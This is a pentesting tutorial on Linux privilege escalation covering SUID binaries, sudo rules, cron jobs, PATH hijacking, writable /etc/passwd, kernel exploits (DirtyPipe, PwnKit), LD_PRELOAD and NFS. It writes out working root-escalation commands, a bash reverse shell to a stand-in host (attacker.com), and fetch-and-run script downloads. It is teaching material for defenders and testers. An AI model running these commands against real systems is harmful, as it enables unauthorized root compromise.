Ethical Hacking #privilege-escalation#linux#pentesting

Linux Privilege Escalation Techniques and Tools

Learn the essential Linux privilege escalation techniques used in CTFs and real pentests — SUID, sudo misconfigs, cron jobs, writable paths, and more.

7 min read

Privilege escalation is the phase of a penetration test that follows initial access. You’ve landed a shell as a low-privileged user — now the objective is to become root. Linux systems offer a rich attack surface for this because of the complexity of file permissions, scheduled tasks, running services, and the many ways administrators misconfigure systems over time.

This guide covers the most productive techniques, the tools that automate enumeration, and the manual checks every pentester should know.

Automated Enumeration Tools

Before diving into manual techniques, run an automated script to surface obvious issues quickly.

LinPEAS

LinPEAS (Linux Privilege Escalation Awesome Script) is the gold standard. It checks hundreds of privilege escalation vectors and color-codes findings by severity:

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Or transfer it to the target and run it:

wget http://attacker.com/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh | tee /tmp/linpeas_output.txt

LinEnum

An older but still useful script:

wget http://attacker.com/LinEnum.sh -O /tmp/linenum.sh
chmod +x /tmp/linenum.sh
/tmp/linenum.sh -t

linux-exploit-suggester

Identifies kernel exploits relevant to the current kernel version:

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
bash linux-exploit-suggester.sh

SUID / SGID Binaries

SUID binaries run with the file owner’s permissions (often root) regardless of who executes them. Misconfigured SUID binaries are one of the most common privilege escalation paths.

Find SUID Binaries

find / -perm -4000 -type f 2>/dev/null

Find SGID Binaries

find / -perm -2000 -type f 2>/dev/null

Check any non-standard SUID binaries against GTFOBins — a curated list showing how to abuse binaries for privilege escalation.

Common SUID Escalations

bash with SUID set:

bash -p
# -p prevents bash from dropping SUID privileges

find with SUID set:

find . -exec /bin/sh \; -quit

vim with SUID set:

vim -c ':!/bin/sh'

Sudo Misconfigurations

The sudo configuration is one of the first things to check.

sudo -l

This lists what the current user can run as root without (or with) a password.

Common Sudo Escalations

If a user can run vim as root:

sudo vim -c ':!/bin/bash'

If a user can run python3 as root:

sudo python3 -c 'import os; os.system("/bin/bash")'

If the sudoers entry uses a wildcard or lacks argument restrictions:

# If rule is: user ALL=(ALL) NOPASSWD: /usr/bin/find *
sudo find /etc/passwd -exec /bin/sh \; -quit

Wildcard abuse and argument injection into sudo rules are covered extensively on GTFOBins.

Cron Jobs

Cron jobs running as root with writable scripts are a classic escalation path.

cat /etc/crontab
cat /etc/cron.d/*
ls -la /var/spool/cron/crontabs/

Also check for cron logs:

cat /var/log/syslog | grep cron
cat /var/log/cron.log

If a cron job calls a script you can write to:

echo '#!/bin/bash\nbash -i >& /dev/tcp/attacker.com/4444 0>&1' > /path/to/script.sh
chmod +x /path/to/script.sh

Wait for the cron job to fire and catch the reverse shell.

Writable PATH and Script Hijacking

If a root-owned script or cron job calls a binary by name (not full path) and your PATH includes a writable directory, you can hijack the call:

# Check PATH
echo $PATH

# Create a malicious binary early in PATH
echo '/bin/bash' > /tmp/service
chmod +x /tmp/service
export PATH=/tmp:$PATH

# When the root process calls "service", it runs your /tmp/service instead

World-Writable Files and Directories

find / -writable -type f 2>/dev/null | grep -v proc
find / -writable -type d 2>/dev/null

Key targets:

  • /etc/passwd — if writable, add a new root user
  • /etc/sudoers — if writable, give yourself full sudo
  • Script files called by root processes

Adding a Root User via /etc/passwd

If /etc/passwd is writable:

# Generate a password hash
openssl passwd -1 -salt hacker password123
# Output: $1$hacker$hashed...

# Append a new root-level user
echo 'hacker:$1$hacker$hashed...:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker

Kernel Exploits

When nothing else works, check the kernel version:

uname -r
cat /etc/os-release

Search for known exploits:

  • Exploit-DB
  • linux-exploit-suggester output
  • CVE databases for the specific kernel version

DirtyPipe (CVE-2022-0847)

A notable kernel exploit affecting Linux 5.8 through 5.16.11 that allows writing to read-only files:

# Compile and run the DirtyPipe PoC
gcc dirtypipe.c -o dirtypipe
./dirtypipe /etc/passwd 1 "hacker::0:0:hacker:/root:/bin/bash"

PwnKit (CVE-2021-4034)

A vulnerability in pkexec (part of Polkit) affecting most major Linux distributions:

git clone https://github.com/berdav/CVE-2021-4034
cd CVE-2021-4034
make
./cve-2021-4034

Environment Variable Abuse

LD_PRELOAD

If a sudo rule allows running a program and preserves the LD_PRELOAD environment variable:

// shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/find

NFS Root Squash Misconfiguration

If an NFS share has no_root_squash set, you can mount it from an attacker machine and create SUID binaries:

# On attacker machine
showmount -e target_ip
mount -o rw,vers=2 target_ip:/share /mnt/nfs

# Create SUID bash copy
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash

# On target machine
/share/bash -p

Capabilities

Linux capabilities grant specific root privileges to binaries without full root access. Check for misconfigured capabilities:

getcap -r / 2>/dev/null

If Python has the cap_setuid capability:

# /usr/bin/python3 = cap_setuid+eip
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Quick Checklist

When you land on a new Linux system:

  1. whoami && id && hostname — confirm your context
  2. sudo -l — check sudo permissions
  3. find / -perm -4000 2>/dev/null — SUID binaries
  4. cat /etc/crontab — scheduled tasks
  5. ps aux | grep root — running services
  6. cat /etc/passwd — user accounts
  7. Run LinPEAS for comprehensive coverage

Summary

Linux privilege escalation rarely requires finding a zero-day. Most real-world escalations exploit misconfigurations — a SUID binary on GTFOBins, a world-writable cron script, or an overly permissive sudoers rule. Automated tools like LinPEAS surface these quickly, but the ability to understand and manually verify findings is what separates skilled pentesters from those who just run scripts.

#ctf #post-exploitation #pentesting #linux #privilege-escalation

// related articles

ethical-hacking Linux Post-Exploitation Enumeration Guide 7 min read ethical-hacking Linux Privilege Escalation Techniques 10 min read ethical-hacking Windows Privilege Escalation Guide with WinPEAS 7 min read